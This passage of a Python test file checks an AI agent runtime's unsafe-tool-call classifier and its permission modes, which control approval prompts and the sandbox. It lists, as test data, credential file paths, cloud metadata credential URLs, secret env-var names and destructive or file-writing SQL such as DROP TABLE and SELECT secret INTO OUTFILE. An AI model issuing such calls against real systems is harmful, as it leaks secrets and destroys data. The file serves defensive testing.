)
def test_mcp_classifier(tool, unsafe):
name = f"{MCP_TOOL_PREFIX}srv1__{tool}"
assert is_potentially_unsafe_tool_call(name, {}) is unsafe
@pytest.mark.parametrize(
("args", "unsafe"),
[
({"path": "/etc/passwd"}, True), # read-named tool at a credential path
({"path": "../../.ssh/id_rsa"}, True),
({"nested": {"file": "~/.aws/credentials"}}, True),
({"name": "OPENAI_API_KEY"}, True), # explicit credential env-var read
({"name": "AWS_SECRET_ACCESS_KEY"}, True),
({"key": "DATABASE_PASSWORD"}, True),
(
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
True,
), # AWS instance-metadata host
(
{"url": "http://metadata.google.internal/computeMetadata/v1/"},
True,
), # GCP metadata host
({"path": "notes.txt"}, False), # ordinary path stays safe
({"path": "data/report.csv"}, False),
({"name": "PATH"}, False), # a non-secret env var stays safe
({"name": "HOME"}, False),
({"url": "https://example.com/api"}, False), # ordinary URL stays safe
({"url": "http://localhost:8080/health"}, False), # localhost app stays safe
],
)
def test_mcp_sensitive_arguments(args, unsafe):
name = f"{MCP_TOOL_PREFIX}fs__read_file"
assert is_potentially_unsafe_tool_call(name, args) is unsafe
@pytest.mark.parametrize(
("args", "unsafe"),
[
({"query": "DELETE FROM runs"}, True), # read-named tool, mutating query
({"sql": "DROP TABLE users"}, True),
({"query": "UPDATE t SET x=1"}, True),
({"query": "INSERT INTO t VALUES (1)"}, True),
({"query": "SELECT * FROM runs"}, False), # read query stays safe
({"query": "how to delete old files"}, False), # NL text with 'delete' stays safe
({"query": "find the created_at column"}, False), # 'created' substring stays safe
({"query": "DELETE/**/FROM runs"}, True), # inline SQL comment as whitespace
({"query": "UPDATE/**/t SET x=1"}, True),
({"query": "DROP/**/TABLE users"}, True),
({"query": "SELECT * FROM runs -- delete later"}, False), # trailing comment stays safe
({"query": "COPY users FROM '/tmp/u.csv'"}, True), # bulk load writes the table
({"query": "COPY users (id, name)\nFROM STDIN"}, True), # multiline COPY FROM
({"query": "COPY (SELECT 1) TO '/tmp/o.csv'"}, True), # COPY TO writes a server file
({"query": "SELECT copy_count FROM t"}, False), # 'copy' substring column stays safe
({"query": "mutation { deleteIssue(id: 1) }"}, True), # GraphQL mutation
({"query": "mutation DelIssue { deleteIssue(id: 1) }"}, True), # named GraphQL mutation
({"query": "mutation # note\n { deleteIssue(id: 1) }"}, True), # comment before body
({"query": "mutation # c\n Del { deleteIssue(id: 1) }"}, True), # comment before name
({"query": "query { issue(id: 1) { title } }"}, False), # GraphQL read query stays safe
({"query": "{ issue(id: 1) { title } }"}, False), # shorthand GraphQL query stays safe
({"query": "query # note\n { issue(id: 1) }"}, False), # commented read query stays safe
({"query": "CREATE OR REPLACE VIEW v AS SELECT 1"}, True), # DDL with a modifier
({"query": "CREATE UNIQUE INDEX idx ON t(x)"}, True), # DDL with UNIQUE
({"query": "CREATE TEMP TABLE t (id int)"}, True), # DDL with TEMP
({"query": "CREATE MATERIALIZED VIEW mv AS SELECT 1"}, True), # materialized view DDL
({"query": "CREATE FUNCTION f() RETURNS int AS $$ $$"}, True), # function DDL
({"query": "ALTER SYSTEM SET work_mem = '1GB'"}, True), # persists server config
({"query": "alter system reset all"}, True), # ALTER SYSTEM RESET
({"query": "SELECT * FROM system_logs"}, False), # 'system' as a table name stays safe
({"query": "SELECT * FROM created_view"}, False), # 'create' substring stays safe
({"query": "CALL delete_all_users()"}, True), # stored procedure invocation
({"query": "EXEC purge_queue"}, True), # EXEC procedure
({"query": "EXECUTE sp_drop"}, True), # EXECUTE procedure
({"query": "VACUUM INTO 'backup.db'"}, True), # VACUUM rewrites the database
({"query": "please call me back later"}, False), # NL 'call' stays safe
({"query": "ATTACH DATABASE '/tmp/x.db' AS x"}, True), # attaches a database file
({"query": "DETACH DATABASE x"}, True), # detaches a database
({"query": "PRAGMA user_version = 42"}, True), # write-form PRAGMA
({"query": "PRAGMA journal_mode=WAL"}, True), # write-form PRAGMA (no spaces)
({"query": "PRAGMA foreign_keys(0)"}, True), # call-form PRAGMA write
({"query": "SELECT load_extension('/tmp/evil.so')"}, True), # loads native code
({"query": "PRAGMA journal_mode"}, False), # read-form PRAGMA stays safe
({"query": "can you attach the report to the email"}, False), # NL 'attach' stays safe
({"query": "ATTACH '/tmp/x.db' AS x"}, True), # ATTACH without DATABASE keyword
({"query": "PRAGMA main.user_version = 1"}, True), # schema-qualified write PRAGMA
({"query": "attach it as draft"}, False), # NL 'attach ... as' stays safe
({"query": "DROP FUNCTION f()"}, True), # DROP of a non-table object
({"query": "ALTER INDEX idx RENAME TO idx2"}, True), # ALTER of a non-table object
({"query": "DROP MATERIALIZED VIEW mv"}, True), # DROP with a modifier
({"query": "ALTER USER bob WITH PASSWORD 'x'"}, True), # ALTER USER mutates
({"query": "SELECT dropped_at FROM t"}, False), # 'drop' substring column stays safe
({"query": "mutation M @audit { deleteIssue(id: 1) }"}, True), # directive GraphQL mutation
(
{"query": "query Q @cached { issue(id: 1) { title } }"},
False,
), # directive GraphQL read stays safe
({"query": 'UPDATE "users" SET admin=1'}, True), # double-quoted UPDATE target
({"query": "UPDATE public.users SET admin=1"}, True), # schema-qualified UPDATE
({"query": "UPDATE ONLY public.users SET admin=1"}, True), # ONLY-qualified UPDATE
({"query": "UPDATE `users` SET admin=1"}, True), # backtick-quoted UPDATE
({"query": "UPDATE [users] SET admin=1"}, True), # bracket-quoted UPDATE
({"query": "please update the documentation set"}, False), # NL 'update ... set' stays safe
({"query": "SELECT pg_terminate_backend(123)"}, True), # state-changing SQL function
({"query": "SELECT setval('s', 1)"}, True), # sequence mutation function
({"query": "SELECT pg_write_file('/tmp/p', 'x')"}, True), # server-side file write
({"query": "SELECT lo_export(123, '/tmp/p')"}, True), # large-object export to a file
({"query": "SELECT setval_col FROM t"}, False), # 'setval' column prefix stays safe
(
{"query": "SELECT secret INTO OUTFILE '/tmp/leak' FROM users"},
True,
), # INTO OUTFILE write
({"query": "SELECT x INTO DUMPFILE '/tmp/d' FROM t"}, True), # INTO DUMPFILE write
(
{"query": "SELECT count(*) INTO cnt FROM t"},
False,
), # PL/pgSQL SELECT INTO var stays safe
({"query": "REFRESH MATERIALIZED VIEW mv"}, True), # materialized view rewrite
({"query": "REINDEX INDEX idx"}, True), # index rebuild
({"query": "REINDEX TABLE t"}, True), # table reindex
({"query": "SELECT refresh_count FROM t"}, False), # 'refresh' column stays safe
({"query": "please refresh the page"}, False), # NL 'refresh' stays safe
({"query": "COMMENT ON TABLE users IS 'owned'"}, True), # catalog metadata write
({"query": "LOCK TABLE users IN ACCESS EXCLUSIVE MODE"}, True), # explicit lock
({"query": "SECURITY LABEL FOR x ON TABLE t IS 'z'"}, True), # security label write
({"query": "CREATE POLICY p ON accounts USING (true)"}, True), # row-security policy DDL
({"query": "SELECT comment FROM t"}, False), # 'comment' column stays safe
({"query": "SELECT * FROM locks"}, False), # 'locks' table stays safe
({"query": "SELECT nextval('billing_seq')"}, True), # sequence advance mutates
({"query": "SELECT pg_advisory_lock(42)"}, True), # advisory lock changes state
({"query": "SELECT pg_notify('jobs', 'wake')"}, True), # server-side notification
({"query": "SELECT set_config('x', 'y', false)"}, True), # session config write
({"query": "SELECT nextval_col FROM t"}, False), # 'nextval' column prefix stays safe
({"query": "TRUNCATE users"}, True), # multi-char table name (bare TRUNCATE)
({"query": "TRUNCATE TABLE accounts"}, True), # multi-char TRUNCATE TABLE
({"query": 'TRUNCATE TABLE "users"'}, True), # quoted TRUNCATE target
({"query": "TRUNCATE accounts RESTART IDENTITY"}, True), # TRUNCATE with options
({"query": "SELECT truncate_log FROM t"}, False), # 'truncate' column stays safe
({"query": "UPDATE users AS u SET admin=1"}, True), # aliased UPDATE target (AS)
({"query": 'UPDATE "users" AS u SET x=1'}, True), # quoted+aliased UPDATE
({"query": "UPDATE public.users AS u SET x=1"}, True), # schema-qualified aliased UPDATE
({"query": "SELECT * FROM users AS u"}, False), # aliased SELECT stays safe
({"query": "please update the documentation set"}, False), # NL, no AS, stays safe
({"query": "GRANT SELECT ON t TO u"}, True), # privilege grant (multi-word)
({"query": "REVOKE ALL ON t FROM u"}, True), # privilege revoke (multi-word)
({"query": "SELECT * FROM grants"}, False), # 'grants' table stays safe
({"url": "http://x", "method": "DELETE"}, True), # mutating HTTP verb arg
({"method": "POST"}, True),
({"verb": "PUT"}, True), # alternate method-key name
({"method": "GET"}, False), # read HTTP verb stays safe
({"method": "HEAD"}, False),
],
)
def test_mcp_mutating_arguments(args, unsafe):
name = f"{MCP_TOOL_PREFIX}db__query_database"
assert is_potentially_unsafe_tool_call(name, args) is unsafe
# ── loop behavior ───────────────────────────────────────────────────
_DEFAULT_TOOLS = [
{"type": "function", "function": {"name": "python"}},
{"type": "function", "function": {"name": "web_search"}},
]
class _FakeExecuteTool:
def __init__(self):
self.calls = []
self.disable_sandbox_seen = []
def __call__(
self,
name,
arguments,
*,
cancel_event = None,
timeout = None,
session_id = None,
thread_id = None,
rag_scope = None,
disable_sandbox = False,
):
self.calls.append((name, arguments))
self.disable_sandbox_seen.append(disable_sandbox)
return f"RESULT[{name}]"
def _tool_call(name, args_json):
return f'<tool_call>{{"name": "{name}", "arguments": {args_json}}}</tool_call>'
def _multi_turn(turns):
turn_iter = iter(turns)
def _gen(_messages):
try:
yield next(turn_iter)
except StopIteration:
return
return _gen
def _drive(turns, decisions, **loop_kwargs):
"""Run the loop, resolving each gated tool_start with the next decision."""
decision_iter = iter(decisions)
exec_fn = _FakeExecuteTool()
# A per-call session id so a leaked pending approval from another test can
# never collide with this run's approval registry entries.
session = f"{_SESSION}-{uuid.uuid4().hex}"
gen = run_safetensors_tool_loop(
single_turn = _multi_turn(turns),
messages = [{"role": "user", "content": "hi"}],
tools = _DEFAULT_TOOLS,
execute_tool = exec_fn,
session_id = session,
**loop_kwargs,
)
events = []
for ev in gen:
events.append(ev)
if ev["type"] == "tool_start" and ev.get("awaiting_confirmation"):
resolve_tool_decision(ev["approval_id"], next(decision_iter), session_id = session)
return events, exec_fn
def _tool_starts(events):
return [e for e in events if e["type"] == "tool_start"]
def _diag(events, exec_fn):
"""A compact dump of what the loop actually did, attached to the loop-driving
assertions so a full-suite-only failure on CI (which does not reproduce when
the file runs alone) reports the real event stream instead of a bare diff."""
return (
f"calls={exec_fn.calls} sandbox_seen={exec_fn.disable_sandbox_seen} "
f"events={[(e.get('type'), e.get('awaiting_confirmation'), e.get('tool_name')) for e in events]}"
)
def test_auto_mode_does_not_gate_safe_calls():
events, exec_fn = _drive(
[_tool_call("python", '{"code": "print(1)"}'), "final"],
[],
confirm_tool_calls = True,
permission_mode = "auto",
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is False, _diag(events, exec_fn)
assert starts[0]["approval_id"] == ""
assert exec_fn.calls == [("python", {"code": "print(1)"})], _diag(events, exec_fn)
assert exec_fn.disable_sandbox_seen == [False], _diag(
events, exec_fn
) # sandbox stays on in auto
def test_auto_mode_gates_unsafe_calls():
events, exec_fn = _drive(
[_tool_call("python", '{"code": "import os; os.remove(\\"x\\")"}'), "final"],
["allow"],
confirm_tool_calls = True,
permission_mode = "auto",
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is True, _diag(events, exec_fn)
assert starts[0]["approval_id"]
assert len(exec_fn.calls) == 1, _diag(events, exec_fn)
assert exec_fn.disable_sandbox_seen == [False], _diag(events, exec_fn)
def test_ask_mode_gates_even_safe_calls():
events, _ = _drive(
[_tool_call("python", '{"code": "print(1)"}'), "final"],
["allow"],
confirm_tool_calls = True,
permission_mode = "ask",
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is True
def test_unset_mode_behaves_as_ask():
events, _ = _drive(
[_tool_call("python", '{"code": "print(1)"}'), "final"],
["allow"],
confirm_tool_calls = True,
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is True
def test_off_mode_never_gates_and_keeps_sandbox():
# "Off": no prompts even for unsafe calls, but the sandbox stays on.
events, exec_fn = _drive(
[_tool_call("python", '{"code": "import os; os.remove(\\"x\\")"}'), "final"],
[],
confirm_tool_calls = True, # off must win over a stray confirm flag
permission_mode = "off",
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is False, _diag(events, exec_fn)
assert starts[0]["approval_id"] == ""
assert exec_fn.disable_sandbox_seen == [False], _diag(events, exec_fn)
def test_full_mode_never_gates_and_drops_sandbox():
events, exec_fn = _drive(
[_tool_call("python", '{"code": "import os; os.remove(\\"x\\")"}'), "final"],
[],
confirm_tool_calls = True, # full must win over the confirm gate
permission_mode = "full",
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is False, _diag(events, exec_fn)
assert exec_fn.disable_sandbox_seen == [True], _diag(events, exec_fn)
def test_bypass_flag_implies_full_mode():
# Legacy callers that only set bypass_permissions keep the same behavior.
events, exec_fn = _drive(
[_tool_call("python", '{"code": "print(1)"}'), "final"],
[],
confirm_tool_calls = True,
bypass_permissions = True,
)
starts = _tool_starts(events)
assert starts and starts[0]["awaiting_confirmation"] is False, _diag(events, exec_fn)
assert exec_fn.disable_sandbox_seen == [True], _diag(events, exec_fn)
def test_bypass_permissions_folds_to_full_on_request_models():
# A legacy bypass caller that also sends a stale ask/auto mode normalizes to
# full, so the route guards (which reject ask/auto) don't 400 the request.
for cls in (ChatCompletionRequest, AnthropicMessagesRequest):
req = cls(
messages = [{"role": "user", "content": "hi"}],
bypass_permissions = True,
permission_mode = "auto",
)
assert req.permission_mode == "full"
assert req.bypass_permissions is True
def test_unknown_permission_mode_normalizes_to_ask_on_request_models():
# An unrecognized mode from a newer UI/client must degrade to the safest gate
# ("ask") at the API boundary instead of a 422, so the forward-compat fallback
# the tool loops already apply (unknown -> ask) is reachable. None stays unset;
# the four known modes pass through untouched.
for cls in (ChatCompletionRequest, AnthropicMessagesRequest):
for unknown in ("paranoid", "readonly", "bogus", ""):
req = cls(
messages = [{"role": "user", "content": "hi"}],
permission_mode = unknown,
)
assert req.permission_mode == "ask", (cls.__name__, unknown)
assert (
cls(messages = [{"role": "user", "content": "hi"}], permission_mode = None).permission_mode
is None
)
for known in ("ask", "auto", "off", "full"):
req = cls(
messages = [{"role": "user", "content": "hi"}],
permission_mode = known,
)
# 'full' folds to bypass but the mode string is preserved.
assert req.permission_mode == known, (cls.__name__, known)
def test_ask_auto_self_enable_confirm_on_chat_request():
# "Ask" gates every call, so a direct /chat/completions caller that requests
# ask but omits the legacy confirm flag self-enables it when Studio's own tool
# loop is requested. Only the router's loop-entry signals count (enable_tools /
# mcp_enabled); enabled_tools alone never starts the loop.
for loop in ({"enable_tools": True}, {"mcp_enabled": True}):
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "ask",
**loop,
)
assert req.confirm_tool_calls is True
# "auto" is NOT folded: it only prompts for a classifier-flagged call, so
# leaving confirm unset lets the route apply the safe-only-selection exception
# (a safe-only auto request needs no stream) instead of an explicit confirm
# forcing stream=true. The mode still drives the loop's per-call gate.
for loop in ({"enable_tools": True}, {"mcp_enabled": True}):
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "auto",
**loop,
)
assert req.confirm_tool_calls is None
# enabled_tools by itself is a passthrough filter, not a loop-entry signal:
# a client-tool passthrough that also lists enabled_tools must route verbatim
# (confirm stays unset), else the confirm-without-stream guard 400s it.
for mode in ("ask", "auto"):
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = mode,
enabled_tools = ["terminal"],
tools = [{"type": "function", "function": {"name": "f"}}],
)
assert req.confirm_tool_calls is None
# An explicit confirm_tool_calls=False wins over the ask mode (opts out of the
# gate), matching _permission_mode_confirm and the Anthropic pre-switch guard;
# the fold only self-enables when the flag is unset, so a caller cannot get a
# different answer on the chat path than the Anthropic path for the same body.
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "ask",
enable_tools = True,
confirm_tool_calls = False,
)
assert req.confirm_tool_calls is False
# A plain client-tool passthrough (client-supplied tools that Studio does not
# execute) must NOT self-enable confirm, or the route rejects the passthrough.
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "ask",
tools = [{"type": "function", "function": {"name": "f"}}],
)
assert req.confirm_tool_calls is None
# ask/auto without any tool request has nothing to gate; confirm stays unset.
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "ask",
)
assert req.confirm_tool_calls is None
# Legacy callers with no permission_mode keep their confirm flag untouched.
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
confirm_tool_calls = False,
)
assert req.confirm_tool_calls is False
# External-provider requests are not folded (the provider branch rejects
# confirm_tool_calls with tools, and permission_mode is a local concept).
for extra in ({"provider_id": "p1"}, {"provider_type": "openai"}):
req = ChatCompletionRequest(
messages = [{"role": "user", "content": "hi"}],
permission_mode = "ask",
enable_tools = True,
**extra,
)
assert req.confirm_tool_calls is None
def test_permission_mode_confirm_derivation():
# The route derives the effective confirm gate from permission_mode so that a
# tool loop forced on by CLI policy (no request-level tool flag) still honors
# the documented "unset behaves as ask" default.
from routes.inference import _permission_mode_confirm
def req(**kw):
return ChatCompletionRequest(messages = [{"role": "user", "content": "hi"}], **kw)
# An explicit confirm flag always wins (True gates, False opts out).
assert _permission_mode_confirm(req(confirm_tool_calls = True, stream = False)) is True
assert _permission_mode_confirm(req(confirm_tool_calls = False, permission_mode = "ask")) is False
# Explicit ask/auto always engage the gate (a non-streaming one is rejected
# by the guard that reads this).
assert _permission_mode_confirm(req(permission_mode = "ask", stream = False)) is True
assert _permission_mode_confirm(req(permission_mode = "auto", stream = False)) is True
# off/full never prompt.
assert _permission_mode_confirm(req(permission_mode = "off")) is False
assert _permission_mode_confirm(req(permission_mode = "full")) is False
# An unset mode defaults to ask, but only realizably on a streaming request;
# a non-streaming unset request keeps the legacy run-without-gate behavior.
assert _permission_mode_confirm(req(stream = True)) is True
assert _permission_mode_confirm(req(stream = False)) is False
def test_confirm_gate_needs_stream():
# auto only prompts for a classifier-flagged call, so an auto request that can
# only select always-safe tools (web_search / RAG) needs no stream and must not
# be rejected by the confirm-without-stream guard.
from routes.inference import _confirm_gate_needs_stream
def req(**kw):
return ChatCompletionRequest(messages = [{"role": "user", "content": "hi"}], **kw)
safe = ["web_search", "search_knowledge_base"]
# auto + a safe-only selection never prompts -> no stream needed.
assert _confirm_gate_needs_stream(req(permission_mode = "auto", enabled_tools = safe)) is False
assert (
_confirm_gate_needs_stream(req(permission_mode = "auto", enabled_tools = ["web_search"]))
is False
)
# render_html can prompt when its canvas reaches the network, so a selection
# that includes it needs a stream to deliver that prompt.
assert (
_confirm_gate_needs_stream(
req(permission_mode = "auto", enabled_tools = ["web_search", "render_html"])
)
is True
)
# But a selectable unsafe tool, an unrestricted (omitted) selection, MCP, or an
# explicit confirm flag all still require streaming under auto.
assert (
_confirm_gate_needs_stream(req(permission_mode = "auto", enabled_tools = ["terminal"])) is True
)
assert _confirm_gate_needs_stream(req(permission_mode = "auto", enable_tools = True)) is True
assert (
_confirm_gate_needs_stream(
req(permission_mode = "auto", enabled_tools = ["web_search"], mcp_enabled = True)
)
is True
)
assert (
_confirm_gate_needs_stream(
req(permission_mode = "auto", enabled_tools = ["web_search"], confirm_tool_calls = True)
)
is True
)
# An explicit empty selection runs no built-in tool, so nothing can prompt and
# no stream is needed (distinct from an omitted list, which means all tools).
assert (
_confirm_gate_needs_stream(req(permission_mode = "auto", enable_tools = True, enabled_tools = []))
is False
)
# ask prompts for every call, so even a safe-only selection needs streaming.
assert _confirm_gate_needs_stream(req(permission_mode = "ask", enabled_tools = safe)) is True
# off/full never prompt; unset non-streaming keeps the legacy run-without-gate.
assert _confirm_gate_needs_stream(req(permission_mode = "off", enabled_tools = safe)) is False
assert _confirm_gate_needs_stream(req(permission_mode = "full", enabled_tools = safe)) is False
assert _confirm_gate_needs_stream(req(enabled_tools = safe, stream = False)) is False